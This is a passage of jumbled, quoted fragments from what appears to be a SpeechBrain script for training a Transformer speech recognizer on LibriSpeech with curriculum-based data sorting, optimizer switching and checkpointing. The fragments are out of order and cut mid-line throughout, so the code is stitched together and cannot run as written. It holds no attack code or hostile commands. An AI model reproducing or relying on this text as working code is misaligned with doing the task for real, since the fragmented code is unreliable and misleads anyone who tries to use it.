sb.Stage.TRAIN) loss, loss_ctc, loss_seq", "on all processes self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch) self.avg_train_loss = 0.0 self.step = 0 #", "import LoopedLoader from speechbrain.core import Stage import time def make_dataloader( dataset, stage, ckpt_prefix=\"dataloader-\",", "sake of efficiency, we only perform beamsearch with limited capacity # and no", "current_epoch > self.hparams.stage_one_epochs: del self.optimizer self.optimizer = self.hparams.SGD(self.modules.parameters()) # Load latest checkpoint to", "valid_set is not None and not ( isinstance(valid_set, DataLoader) or isinstance(valid_set, LoopedLoader) ):", "): \"\"\"Returns a list of data ids, fulfilling the filtering criteria.\"\"\" def combined_filter(computed,", "`make_dataloader()` for making the train_loader (if train_set is a Dataset, not DataLoader). E.G.", "not shuffle in dataloader ! otherwise is pointless hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # if", "# elif hparams[\"sorting\"] == \"random\": # pass # else: # raise NotImplementedError( #", "- Options for order: `asc`, `desc` - Example: * \"input_length:asc,output_length:desc\" - Sort the", "dataset) the only methods that need to be overridden are: * ``compute_forward()`` *", "this will be passed all modules in ``modules`` at the beginning of the", "wavs = torch.cat([wavs, wavs_noise], dim=0) wav_lens = torch.cat([wav_lens, wav_lens]) tokens_bos = torch.cat([tokens_bos, tokens_bos],", "early stop if loss is not fini self.check_gradients(loss) self.optimizer.step() self.optimizer.zero_grad() # anneal lr", "stats_meta=epoch_stats, train_stats=self.train_stats, valid_stats=stage_stats, ) self.checkpointer.save_and_keep_only( meta={\"ACC\": stage_stats[\"ACC\"], \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=5, ) elif", "order\"\"\" text1 = self.data[key1][\"wrd\"] text2 = self.data[key2][\"wrd\"] if text1 > text2: return 1", "Default ``2``. If a non-positive number is passed, all epochs are run. jit_module_keys", "self.hparams.train_logger.log_stats( stats_meta=epoch_stats, train_stats=self.train_stats, valid_stats=stage_stats, ) self.checkpointer.save_and_keep_only( meta={\"ACC\": stage_stats[\"ACC\"], \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=5, )", "key_max_value, key_test): \"\"\"Checks if the data example fulfills the filtering criteria\"\"\" for key,", "test_stats=stage_stats, ) with open(self.hparams.wer_file, \"w\") as w: self.wer_metric.write_stats(w) # save the averaged checkpoint", "sorting gone wrong.\" weights = {} for index,data_id in enumerate(shuffled_data_ids): weights[data_id] = index", "self.step == self.debug_batches: break # Write validation summary to tensorboard self.tensorboard_writer.add_scalar(\"Validation/Loss/tot_loss\", avg_valid_loss, epoch)", "system employs a convolutional frontend and a transformer. The decoder is based on", "curriculum_based_filtered_sorted( self, key_min_value={}, key_max_value={}, key_test={}, min_weight=None, max_weight=None, weights=None, ordering_info=\"\", batch_selection=\"contiguous\", batch_size=8, select_n=None, ):", "``input_length`` in ascending order , tie is broken using ``output_length`` in descending order", "== \"random\": weights = self._random_shuffled_weights(filtered_data_ids) elif ordering_type == \"sorted\": if weights == None:", "min_value == None and max_value == None: return weights if isinstance(min_value,int): min_value =", "import numpy as np from functools import cmp_to_key from torch.utils.data import DataLoader from", "predictions and targets.\"\"\" (p_ctc, p_seq, wav_lens, hyps,) = predictions ids = batch.id tokens_eos,", "and/or sorted version of this based on specified curriculum, shares static data. The", ": str Information to create weights based on pre-defined keys( and/or methods) and", "will have the optimizer added to continue training if interrupted. inter_epoch_dataset_updation : bool", "via an ``hparams`` attribute, using \"dot\" notation: e.g., self.hparams.model(x). run_opts : dict A", "tokens_eos_lens], dim=0 ) tokens = torch.cat([tokens, tokens], dim=0) tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0)", "= True if self.switched is True: return if current_epoch > self.hparams.stage_one_epochs: self.optimizer =", "# Validation stage if valid_set is not None: self.on_stage_start(Stage.VALID, epoch) self.modules.eval() avg_valid_loss =", ": dict A set of options to change the runtime environment, including debug", "stage 2 group = current_optimizer.param_groups[0] if \"momentum\" not in group: return self.checkpointer.recover_if_possible( device=torch.device(self.device)", "batch_size) elif batch_selection == \"sorted\": pass elif batch_selection == \"reverse-sorted\": weights = self._reverse_sort_batches(weights,", "them. Decoding is performed with (CTC/Att joint) beamsearch coupled with a neural language", "split (e.g, train-clean 100 rather than the full one), and many other possible", "in group: return self.checkpointer.recover_if_possible( device=torch.device(self.device) ) def fit( self, epoch_counter, train_set, valid_set=None, progressbar=None,", "stage if valid_set is not None: self.on_stage_start(Stage.VALID, epoch) self.modules.eval() avg_valid_loss = 0.0 with", "_filter_dataset( self, data_ids, key_min_value={}, key_max_value={}, key_test={} ): \"\"\"Returns a list of data ids,", "will have ``train()``/``eval()`` called on them. opt_class : torch.optim class A torch optimizer", "(e.g. a lambda or partial function definition). By default, this will be passed", "# stage = Stage.TRAIN, # **hparams[\"valid_dataloader_opts\"] # ) # with tqdm( # train_set,", "): \"\"\"Create `weights` for data points using `ordering_info`\"\"\" def compare(key1,key2): \"\"\" Comparing logic,", "# create Dataloader using the weights filtered_sorted_ids = self._weighted_filtered_sorted_ids( weights, min_weight, max_weight, select_n", "are all valid. valid_loader_kwargs : dict Kwargs passed to `make_dataloader()` for making the", "related to curriculum learning self.inter_epoch_dataset_updation = inter_epoch_dataset_updation self.ordering = self.hparams.ordering self.batch_selection = self.hparams.batch_selection", "for validation/test batches\"\"\" with torch.no_grad(): predictions = self.compute_forward(batch, stage=stage) loss, _, _ =", "wav_lens, tokens_lens) loss = ( self.hparams.ctc_weight * loss_ctc + (1 - self.hparams.ctc_weight) *", "is trained on both CTC and negative-log likelihood targets and sub-word units estimated", "key2 * 0 - key1 = key2 \"\"\" for ordering in dataset_orderings: key", "crashing. debug_batches (int) Number of batches to run in debug mode, Default ``2``.", "negative-log likelihood targets and sub-word units estimated with Byte Pairwise Encoding (BPE) are", "this based on specified curriculum, shares static data. The reason to implement these", "key1 = key2 \"\"\" for ordering in dataset_orderings: key = ordering[\"key\"] order =", "and/or methods) and their order. - Format : \"<key1>:<order1>,<key2>:<order2>,........\" - Options for keys:", "weights = {} for index,id in enumerate(sorted_data_ids): weights[id] = index return weights def", "training if interrupted. inter_epoch_dataset_updation : bool Whether dataset must be updated every between", "the progress of each epoch in a progressbar. \"\"\" if not ( isinstance(train_set,", "<NAME> 2021 \"\"\" import os import torch from torch.utils.tensorboard import SummaryWriter import sys", "loss = ( self.hparams.ctc_weight * loss_ctc + (1 - self.hparams.ctc_weight) * loss_seq )", "self.train_set = train_set total_steps = len(train_set) if progressbar is None: progressbar = not", "speechbrain.utils.distributed import run_on_main from speechbrain.dataio.dataset import DynamicItemDataset, FilteredSortedDynamicItemDataset from speechbrain.dataio.sampler import ReproducibleRandomSampler from", "shuffling return else: return def check_and_reset_optimizer(self): \"\"\"reset the optimizer if training enters stage", "== sb.Stage.TEST ): # Decode token terms to words predicted_words = [ tokenizer.decode_ids(utt_seq).split(\"", "loss, loss_ctc, loss_seq = self.compute_objectives(predictions, batch, sb.Stage.TRAIN) # normalize the loss by gradient_accumulation", "return loss.detach() , loss_ctc.detach(), loss_seq.detach() def evaluate_batch(self, batch, stage): \"\"\"Computations needed for validation/test", "= Path(csv_file).stem test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=csv_file, replacements={\"data_root\": data_folder} ) test_datasets[name] = test_datasets[name].filtered_sorted( sort_key=\"duration\"", "need to compute the dynamic items twice. Arguments --------- key_min_value : dict Map", "max_key=\"ACC\", test_loader_kwargs=hparams[\"test_dataloader_opts\"], ) # # print(train_data) # train_set = make_dataloader( # valid_data ,", "The decoder is based on a Transformer decoder. Beamsearch coupled with a Transformer", "self.modules.Transformer( src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index ) # output layer for ctc log-probabilities logits", "``15.0``. If non-positive, these are not saved. checkpointer : speechbrain.Checkpointer By default, this", "used as basic recognition tokens. Training is performed on the full LibriSpeech dataset", "== sb.Stage.TRAIN: if hasattr(self.modules, \"env_corrupt\"): wavs_noise = self.modules.env_corrupt(wavs, wav_lens) wavs = torch.cat([wavs, wavs_noise],", "reverse=False ): \"\"\"Returns a list of data ids, filtered and sorted using custom", "import os import torch from torch.utils.tensorboard import SummaryWriter import sys import logging from", "for training a Transformer ASR system with librispeech. The system employs an encoder,", "to create final dataset batch_size : 8, int Used to divide the dataset", "only iterate a few batches for all datasets, to ensure code runs without", "used. Activate it only with cuda. max_grad_norm (float) Default implementation of ``fit_batch()`` uses", "else: if self.sortagrad != -1: # number of epochs for which curriculum must", "is a Dataset, not DataLoader). E.G. batch_size, num_workers. DataLoader kwargs are all valid.", "= index return weights def _random_shuffled_batches( self, weights=None, batch_size=8, reverse=False ): \"\"\"Randomly shuffle", "when creating # mini-batches. tokenizer = hparams[\"tokenizer\"] # 2. Define audio pipeline: @sb.utils.data_pipeline.takes(\"wav\")", ") return train_data, valid_data, test_datasets, tokenizer if __name__ == \"__main__\": # CLI: hparams_file,", "batch_size : 8, int Used to divide the dataset into batches. This helps", "given a single batch in input\"\"\" # check if we need to switch", "loss is not fini self.check_gradients(loss) self.optimizer.step() self.optimizer.zero_grad() # anneal lr every update self.hparams.noam_annealing(self.optimizer)", "following methods are used and expected to have a certain behavior: * ``fit_batch()``", "checkpointer=hparams[\"checkpointer\"], ) # adding objects to trainer: asr_brain.tokenizer = hparams[\"tokenizer\"] # Training asr_brain.fit(", "Used to divide the dataset into batches. This helps in ordering the dataset", "\"\"\"Randomly shuffle the dataset at batch level\"\"\" data_ids = list(weights.keys()) for data_id in", "according current stage current_epoch = self.hparams.epoch_counter.current if current_epoch <= self.hparams.stage_one_epochs: lr = self.hparams.noam_annealing.current_lr", "): \"\"\"Compare two data points based on input length\"\"\" duration1 = float(self.data[key1][\"duration\"]) duration2", "): \"\"\"Returns a list of data ids, filtered and sorted using custom weights\"\"\"", "torch.no_grad(): predictions = self.compute_forward(batch, stage=stage) loss, _, _ = self.compute_objectives(predictions, batch, stage=stage) return", "batch_size = int(hparams[\"batch_size\"]) train_data = train_data.curriculum_based_filtered_sorted( ordering_info=ordering_info, batch_selection=batch_selection, batch_size=batch_size ) # when sorting", "train_data, valid_data, test_datasets, tokenizer = dataio_prepare(hparams) # # We download the pretrained LM", "`weights` for data points using `ordering_info`\"\"\" def compare(key1,key2): \"\"\" Comparing logic, as `ordering_info`", ", loss_ctc.detach(), loss_seq.detach() def evaluate_batch(self, batch, stage): \"\"\"Computations needed for validation/test batches\"\"\" with", "): super().__init__( modules=modules, opt_class=opt_class, hparams=hparams, run_opts=run_opts, checkpointer=checkpointer ) # save attributes related to", "next key, else return the result if res == 0: continue else: return", "= ( self.hparams.ctc_weight * loss_ctc + (1 - self.hparams.ctc_weight) * loss_seq ) if", "ordering_info def _random_shuffle_data_ids( self, data_ids ): \"\"\"Shuffle the data_ids in random order\"\"\" return", "self.hparams.stage_one_epochs: lr = self.hparams.noam_annealing.current_lr steps = self.hparams.noam_annealing.n_steps optimizer = self.optimizer.__class__.__name__ else: lr =", "for training. If a Dataset is given, a DataLoader is automatically created. If", ", input_length, output_length, alphabetic dataset_ordering = self._parse_dataset_order(ordering_info) ordering_type = \"sorted\" if len(dataset_ordering) >", "on. distributed_backend (str) One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``. device (str) The location", "can be , input_length, output_length, alphabetic dataset_ordering = self._parse_dataset_order(ordering_info) ordering_type = \"sorted\" if", "self.hparams.epoch_counter.current feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch) if stage == sb.Stage.TRAIN: if hasattr(self.hparams, \"augmentation\"):", "DataLoader) or isinstance(train_set, LoopedLoader) ): train_set = self.make_dataloader( train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs ) if", "------- FilteredSortedDynamicItemDataset Shares the static data, but has its own output keys and", "= self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens) loss = ( self.hparams.ctc_weight * loss_ctc + (1", "use case. For a simple use case (e.g., training a single model with", "= self.modules.ctc_lin(enc_out) p_ctc = self.hparams.log_softmax(logits) # output layer for seq2seq log-probabilities pred =", "break def on_evaluate_start(self, max_key=None, min_key=None): \"\"\"perform checkpoint averge if needed\"\"\" super().on_evaluate_start() ckpts =", "= float(min_value) if isinstance(max_value,int): max_value = float(max_value) for key,value in weights.items(): if (isinstance(min_value,float)", "indicating the epoch count. train_set : Dataset, DataLoader A set of data to", "using ordering info weights = self._custom_sorted_weights(filtered_data_ids, dataset_ordering) else: pass else: raise NotImplementedError( \"Ordering", "key_test): \"\"\"Checks if the data example fulfills the filtering criteria\"\"\" for key, limit", "== \"output_length\": res = self._output_length_comparator(key1,key2) elif key == \"alphabetic\": res = self._alphabetic_comparator(key1,key2) res", "# CLI: hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:]) with open(hparams_file) as fin: hparams =", "separate test_datasets = {} for csv_file in hparams[\"test_csv\"]: name = Path(csv_file).stem test_datasets[name] =", "of random, sorted, weighted_sorted.\" ) # order batchwise if batch_selection == \"contiguous\": pass", "self.step = 0 # Validation stage if valid_set is not None: self.on_stage_start(Stage.VALID, epoch)", "default, this will be used to load checkpoints, and will have the optimizer", "speechbrain as sb from hyperpyyaml import load_hyperpyyaml from speechbrain.utils.distributed import run_on_main from speechbrain.dataio.dataset", "train_loader_kwargs={}, valid_loader_kwargs={}, ): \"\"\"Iterate epochs and datasets to improve objective. Relies on the", "batch in tqdm( valid_set, dynamic_ncols=True, disable=not enable ): self.step += 1 loss =", "* ``fit_batch()`` * ``evaluate_batch()`` Arguments --------- modules : dict of str:torch.nn.Module pairs These", "valid_data, test_datasets, tokenizer = dataio_prepare(hparams) # # We download the pretrained LM from", "the dataset into batches. This helps in ordering the dataset at batch level.", "self.on_stage_start(Stage.TRAIN, epoch) self.modules.train() # Reset nonfinite count to 0 each epoch self.nonfinite_count =", "iterable Each call should return an integer indicating the epoch count. train_set :", "key2 \"\"\" for ordering in dataset_orderings: key = ordering[\"key\"] order = 1 if", "right before stage 2 group = current_optimizer.param_groups[0] if \"momentum\" not in group: return", "sb.Stage.VALID and sb.utils.distributed.if_main_process(): # report different epoch stages according current stage current_epoch =", "loss_seq = self.compute_objectives(predictions, batch, sb.Stage.TRAIN) # normalize the loss by gradient_accumulation step (loss", "return 1 elif length1 < length2: return -1 else: return 0 def _alphabetic_comparator(", "current_epoch <= self.hparams.stage_one_epochs: lr = self.hparams.noam_annealing.current_lr steps = self.hparams.noam_annealing.n_steps optimizer = self.optimizer.__class__.__name__ else:", "2021 \"\"\" import os import torch from torch.utils.tensorboard import SummaryWriter import sys import", "lambda or partial function definition). By default, this will be passed all modules", "on the existence of multiple functions that can (or should) be overridden. The", "= train_set total_steps = len(train_set) if progressbar is None: progressbar = not self.noprogressbar", "train_stats=self.train_stats, valid_stats=stage_stats, ) self.checkpointer.save_and_keep_only( meta={\"ACC\": stage_stats[\"ACC\"], \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=5, ) elif stage", "the beginning of each epoch\"\"\" if stage != sb.Stage.TRAIN: self.acc_metric = self.hparams.acc_computer() self.wer_metric", "Number of times to ignore non-finite losses before stopping. Default: ``3``. noprogressbar (bool)", "limited capacity # and no LM to give user some idea of how", "# 3. Define text pipeline: @sb.utils.data_pipeline.takes(\"wrd\") @sb.utils.data_pipeline.provides( \"wrd\", \"tokens_list\", \"tokens_bos\", \"tokens_eos\", \"tokens\" )", "objects as well as tokenization and encoding train_data, valid_data, test_datasets, tokenizer = dataio_prepare(hparams)", "# normalize the loss by gradient_accumulation step (loss / self.hparams.gradient_accumulation).backward() if self.step %", "clipping & early stop if loss is not fini self.check_gradients(loss) self.optimizer.step() self.optimizer.zero_grad() #", "passed to `make_dataloader()` for making the valid_loader (if valid_set is a Dataset, not", "self.step loss, loss_ctc, loss_seq = self.fit_batch(batch) self.avg_train_loss = self.update_average( loss, self.avg_train_loss ) t.set_postfix(train_loss=self.avg_train_loss)", "the end of a epoch.\"\"\" # Compute/store important stats stage_stats = {\"loss\": stage_loss}", "== sb.Stage.TEST ): stage_stats[\"WER\"] = self.wer_metric.summarize(\"error_rate\") # log stats and save checkpoint at", "# we sort training data to speed up training and get better results.", "def compute_objectives(self, predictions, batch, stage): \"\"\"Computes the loss (CTC+NLL) given predictions and targets.\"\"\"", "tokens_bos], dim=0) # compute features feats = self.hparams.compute_features(wavs) current_epoch = self.hparams.epoch_counter.current feats =", "> length2: return 1 elif length1 < length2: return -1 else: return 0", "del self.optimizer self.optimizer = self.hparams.SGD(self.modules.parameters()) # Load latest checkpoint to resume training if", "stage == sb.Stage.VALID and sb.utils.distributed.if_main_process(): # report different epoch stages according current stage", "None elif stage == sb.Stage.VALID: hyps = None current_epoch = self.hparams.epoch_counter.current if current_epoch", "max_keys=[\"ACC\"], num_to_keep=5, ) elif stage == sb.Stage.TEST: self.hparams.train_logger.log_stats( stats_meta={\"Epoch loaded\": self.hparams.epoch_counter.current}, test_stats=stage_stats, )", "data_folder}, ) valid_data = valid_data.filtered_sorted(sort_key=\"duration\") # test is separate test_datasets = {} for", "the datasets objects as well as tokenization and encoding train_data, valid_data, test_datasets, tokenizer", "few epochs if self.debug and epoch == self.debug_epochs: break def on_evaluate_start(self, max_key=None, min_key=None):", "only keep data_point if bool(func(data_point[key])) == True min_weight : None, int If not", "Path(csv_file).stem test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=csv_file, replacements={\"data_root\": data_folder} ) test_datasets[name] = test_datasets[name].filtered_sorted( sort_key=\"duration\" )", "latest checkpoint to resume training if interrupted if self.checkpointer is not None: #", "epochs, for which curriculum based dataset be used. It can take one of", "ordering[\"order\"] == \"asc\" else -1 if key == \"input_length\": res = self._input_length_comparator(key1,key2) elif", "self.tensorboard_writer.add_scalar(\"Train/Loss/ctc_loss\", loss_ctc, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/att_loss\", loss_seq, global_step) # Debug mode only runs a few", "multiple functions that can (or should) be overridden. The following methods are used", "p_seq, wav_lens, hyps,) = predictions ids = batch.id tokens_eos, tokens_eos_lens = batch.tokens_eos tokens,", "contain multiple keys Note: Value and its meaning * 1 - key1 >", "to 1.1 so checkpointer only keeps the averaged checkpoint self.checkpointer.save_and_keep_only( meta={\"ACC\": 1.1, \"epoch\":", "with self.output_keys_as(temp_keys): for i, data_id in enumerate(data_ids): data_point = self.data[data_id] data_point[\"id\"] = data_id", "= len(self.data[key1][\"wrd\"]) length2 = len(self.data[key2][\"wrd\"]) if length1 > length2: return 1 elif length1", "if stage != sb.Stage.TRAIN: current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if current_epoch %", "[] with self.output_keys_as(temp_keys): for i, data_id in enumerate(data_ids): data_point = self.data[data_id] data_point[\"id\"] =", "preferred cl approach return else: # recreate dataset using preferred cl approach return", "``compute_objectives()`` The example below illustrates how overriding these two methods is done. For", "methods. These will be accessible via an ``hparams`` attribute, using \"dot\" notation: e.g.,", "passed to the optimizer by default if they have trainable parameters, and will", "their order. - Format : \"<key1>:<order1>,<key2>:<order2>,........\" - Options for keys: `input_length`, `output_length`, `alphabetic`", "the optimizer by default if they have trainable parameters, and will have ``train()``/``eval()``", "self._output_length_comparator(key1,key2) elif key == \"alphabetic\": res = self._alphabetic_comparator(key1,key2) res *= order # If", "they have the same dynamic items available) \"\"\" # ordering type can be", "we need to switch optimizer # if so change the optimizer from Adam", "= self.hparams.SGD(self.modules.parameters()) if self.checkpointer is not None: self.checkpointer.add_recoverable(\"optimizer\", self.optimizer) self.switched = True def", "avg_valid_loss, epoch) self.tensorboard_writer.add_scalar(\"Validation/Accuracy/tot_acc\", self.acc_metric.summarize(), epoch) # Only run validation \"on_stage_end\" on main process", "= [wrd.split(\" \") for wrd in batch.wrd] self.wer_metric.append(ids, predicted_words, target_words) # compute the", "self.debug and self.step == self.debug_batches: break if ( self.checkpointer is not None and", "implementation of ``fit_batch()`` uses ``clip_grad_norm_`` with this value. Default: ``5``. nonfinite_patience (int) Number", "# Add augmentation if specified if stage == sb.Stage.TRAIN: if hasattr(self.modules, \"env_corrupt\"): wavs_noise", "_alphabetic_comparator( self, key1, key2 ): \"\"\"Compare two data points based on alphabetic order\"\"\"", "batch_size, num_workers. DataLoader kwargs are all valid. valid_loader_kwargs : dict Kwargs passed to", "@sb.utils.data_pipeline.takes(\"wrd\") @sb.utils.data_pipeline.provides( \"wrd\", \"tokens_list\", \"tokens_bos\", \"tokens_eos\", \"tokens\" ) def text_pipeline(wrd): yield wrd tokens_list", "weights def _reverse_sort_batches( self, weights=None, batch_size=8 ): \"\"\"Reverse sort the dataset at batch", "be used to load checkpoints, and will have the optimizer added to continue", "\"random\" filtered_data_ids = self._filter_dataset(self.data_ids, key_min_value, key_max_value, key_test) # order entire dataset if ordering_type", "`ordering_info` can contain multiple keys Note: Value and its meaning * 1 -", "test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=csv_file, replacements={\"data_root\": data_folder} ) test_datasets[name] = test_datasets[name].filtered_sorted( sort_key=\"duration\" ) datasets", "= sb.utils.checkpoints.average_checkpoints( ckpts, recoverable_name=\"model\", device=self.device ) self.hparams.model.load_state_dict(ckpt, strict=True) self.hparams.model.eval() def dataio_prepare(hparams): \"\"\"This function", "Information on how to order batches. - Possible Values are `contiguous`, `random`, `sorted`,", "= self.update_average( loss, self.avg_train_loss ) t.set_postfix(train_loss=self.avg_train_loss) # Write training summary to tensorboard self.tensorboard_writer.add_scalar(\"Train/Loss/tot_loss\",", "= self.checkpointer.find_checkpoints( max_key=max_key, min_key=min_key ) ckpt = sb.utils.checkpoints.average_checkpoints( ckpts, recoverable_name=\"model\", device=self.device ) self.hparams.model.load_state_dict(ckpt,", "False # if hparams[\"sorting\"] == \"ascending\": # # we sort training data to", "pipeline: @sb.utils.data_pipeline.takes(\"wrd\") @sb.utils.data_pipeline.provides( \"wrd\", \"tokens_list\", \"tokens_bos\", \"tokens_eos\", \"tokens\" ) def text_pipeline(wrd): yield wrd", "(e.g., training a single model with a single dataset) the only methods that", "# with tqdm( # train_set, # initial=0, # dynamic_ncols=True, # disable=False, # )", "DataLoader is given, it is used directly. train_loader_kwargs : dict Kwargs passed to", "def _input_length_comparator( self, key1, key2 ): \"\"\"Compare two data points based on input", "loss_seq = self.hparams.seq_cost( p_seq, tokens_eos, length=tokens_eos_lens ) loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens)", "shuffle in dataloader ! otherwise is pointless hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # if hparams[\"sorting\"]", "applied, but only on the first n data points found. Meant for debugging.", "of keys in ``modules`` that should be jit compiled. distributed_count (int) Number of", "dataset. ordering_info : str Information to create weights based on pre-defined keys( and/or", "return weights if isinstance(min_value,int): min_value = float(min_value) if isinstance(max_value,int): max_value = float(max_value) for", "[] for batch in np.random.permutation(np.arange(batch_count)): start_index = batch_size * batch end_index = min((batch_size+1)*batch,", "tokens_list tokens_bos = torch.LongTensor([hparams[\"bos_index\"]] + (tokens_list)) yield tokens_bos tokens_eos = torch.LongTensor(tokens_list + [hparams[\"eos_index\"]])", "using ``output_length`` in descending order Note: This is used only if `weights` is", "self._input_length_comparator(key1,key2) elif key == \"output_length\": res = self._output_length_comparator(key1,key2) elif key == \"alphabetic\": res", "a large variety of different systems. By properly changing the parameter files, you", "keep data_point if weight[data_point] > min_weight max_weight : None, int If not None,", "ids, filtered and sorted using custom weights\"\"\" def weights_filter(weights,min_value,max_value): \"\"\"Checks if the data", "modules=None, opt_class=None, hparams=None, run_opts=None, checkpointer=None, inter_epoch_dataset_updation=False, sortagrad=-1 ): super().__init__( modules=modules, opt_class=opt_class, hparams=hparams, run_opts=run_opts,", "stages according current stage current_epoch = self.hparams.epoch_counter.current if current_epoch <= self.hparams.stage_one_epochs: lr =", "training start\"\"\" super().on_fit_start() # if the model is resumed from stage two, reinitialize", "as multiple modules that need to be updated, the following methods can be", "a Transformer ASR system with librispeech. The system employs an encoder, a decoder,", "the dataset needs to be reshuffled at the end of epoch \"\"\" if", "(ddp) save data preparation run_on_main( prepare_librispeech, kwargs={ \"data_folder\": hparams[\"data_folder\"], \"tr_splits\": hparams[\"train_splits\"], \"dev_splits\": hparams[\"dev_splits\"],", ") # with tqdm( # train_set, # initial=0, # dynamic_ncols=True, # disable=False, #", "if the data example has weight within the range (`min_value`, `max_value`)\"\"\" if min_value", "data_id in data_ids: data_id[weights[data_id]] = data_id data_count = len(data_ids) batch_count = math.ceil(data_count /", "random order\"\"\" return np.random.permutation(data_ids) def _random_shuffled_weights( self, data_ids ): \"\"\"Create random weightages for", "run_opts=run_opts, checkpointer=checkpointer ) # save attributes related to curriculum learning self.inter_epoch_dataset_updation = inter_epoch_dataset_updation", "auto_mix_prec (bool) If ``True``, automatic mixed-precision is used. Activate it only with cuda.", "# Create experiment directory sb.create_experiment_directory( experiment_directory=hparams[\"output_folder\"], hyperparams_to_save=hparams_file, overrides=overrides, ) # multi-gpu (ddp) save", "src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index ) # output layer for ctc log-probabilities logits =", "in dynamic items) to limit, will only keep data_point if data_point[key] >= limit", "methods) and their order. - Format : \"<key1>:<order1>,<key2>:<order2>,........\" - Options for keys: `input_length`,", "if batch_selection == \"contiguous\": pass elif batch_selection == \"random\": weights = self._random_shuffled_batches(weights, batch_size)", "``ddp_mpi``, ``data_parallel``. device (str) The location for performing computations. auto_mix_prec (bool) If ``True``,", "self.hparams.epoch_counter.current if not hasattr(self, \"switched\"): self.switched = False if isinstance(self.optimizer, torch.optim.SGD): self.switched =", "os.path.join( hparams[\"output_folder\"], \"wer_{}.txt\".format(k) ) with torch.no_grad(): asr_brain.evaluate( test_datasets[k], max_key=\"ACC\", test_loader_kwargs=hparams[\"test_dataloader_opts\"], ) # #", "and reshuffles the dataset. By, default, it is False sortagrad: int Number of", "# raise NotImplementedError( # \"sorting must be random, ascending or descending\" # )", "self.check_gradients(loss) self.optimizer.step() self.optimizer.zero_grad() # anneal lr every update self.hparams.noam_annealing(self.optimizer) return loss.detach() , loss_ctc.detach(),", "is done. For more complicated use cases, such as multiple modules that need", "illustrates how overriding these two methods is done. For more complicated use cases,", "Dataset, DataLoader A set of data to use for validation. If a Dataset", "= [] for i, data_id in enumerate(weights.keys()): if select_n is not None and", "wav_lens, epoch=current_epoch) if stage == sb.Stage.TRAIN: if hasattr(self.hparams, \"augmentation\"): feats = self.hparams.augmentation(feats) #", "sb.Stage.TRAIN: hyps = None elif stage == sb.Stage.VALID: hyps = None current_epoch =", "tokenizer if __name__ == \"__main__\": # CLI: hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:]) with", "first n filtered data_points. The possible sorting is applied, but only on the", "= self.hparams.epoch_counter.current if not hasattr(self, \"switched\"): self.switched = False if isinstance(self.optimizer, torch.optim.SGD): self.switched", "is passed, all epochs are run. jit_module_keys (list of str) List of keys", "= batch.tokens_eos tokens, tokens_lens = batch.tokens if hasattr(self.modules, \"env_corrupt\") and stage == sb.Stage.TRAIN:", "self.hparams.epoch_counter.current}, test_stats=stage_stats, ) with open(self.hparams.wer_file, \"w\") as w: self.wer_metric.write_stats(w) # save the averaged", "cl approach return else: # recreate dataset using preferred cl approach return else:", "multiple modules that need to be updated, the following methods can be overridden:", "current_optimizer.param_groups[0] if \"momentum\" not in group: return self.checkpointer.recover_if_possible( device=torch.device(self.device) ) def fit( self,", "the main process. Arguments --------- epoch_counter : iterable Each call should return an", "an attention mechanism between them. Decoding is performed with (CTC/Att joint) beamsearch coupled", "# order entire dataset if ordering_type == \"random\": weights = self._random_shuffled_weights(filtered_data_ids) elif ordering_type", "if self.debug and epoch == self.debug_epochs: break def on_evaluate_start(self, max_key=None, min_key=None): \"\"\"perform checkpoint", "(int) Number of batches to run in debug mode, Default ``2``. debug_epochs (int)", "DataLoader) or isinstance(valid_set, LoopedLoader) ): valid_set = self.make_dataloader( valid_set, stage=sb.Stage.VALID, ckpt_prefix=None, **valid_loader_kwargs, )", "ascending order , tie is broken using ``output_length`` in descending order Note: This", "ordering type can be random, sorted # keys for ordering info can be", "no LM to give user some idea of how the AM is doing", "self.noprogressbar # Iterate epochs for epoch in epoch_counter: # Training stage self.on_stage_start(Stage.TRAIN, epoch)", "does not match the use case. For a simple use case (e.g., training", "dict Kwargs passed to `make_dataloader()` for making the train_loader (if train_set is a", "size `batch_size` and order these batches randomly to create final dataset batch_size :", "``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``. device (str) The location for performing computations. auto_mix_prec (bool)", "With the default hyperparameters, the system employs a convolutional frontend and a transformer.", "of parameters (e.g. a lambda or partial function definition). By default, this will", ") def fit( self, epoch_counter, train_set, valid_set=None, progressbar=None, train_loader_kwargs={}, valid_loader_kwargs={}, ): \"\"\"Iterate epochs", "float(self.data[key2][\"duration\"]) if duration1 > duration2: return 1 elif duration1 < duration2: return -1", "loss by gradient_accumulation step (loss / self.hparams.gradient_accumulation).backward() if self.step % self.hparams.gradient_accumulation == 0:", "to `make_dataloader()` for making the train_loader (if train_set is a Dataset, not DataLoader).", "\"\"\" import os import torch from torch.utils.tensorboard import SummaryWriter import sys import logging", "class. It also defines the data processing pipeline through user-defined functions.\"\"\" data_folder =", "if self.sortagrad != -1: # number of epochs for which curriculum must be", "# compute features feats = self.hparams.compute_features(wavs) current_epoch = self.hparams.epoch_counter.current feats = self.modules.normalize(feats, wav_lens,", "every between epochs or not. It is used in CL which takes feedback", "evaluate_batch(self, batch, stage): \"\"\"Computations needed for validation/test batches\"\"\" with torch.no_grad(): predictions = self.compute_forward(batch,", "prep (parsing Librispeech) from librispeech_prepare import prepare_librispeech # noqa # Create experiment directory", "!= -1: # number of epochs for which curriculum must be used 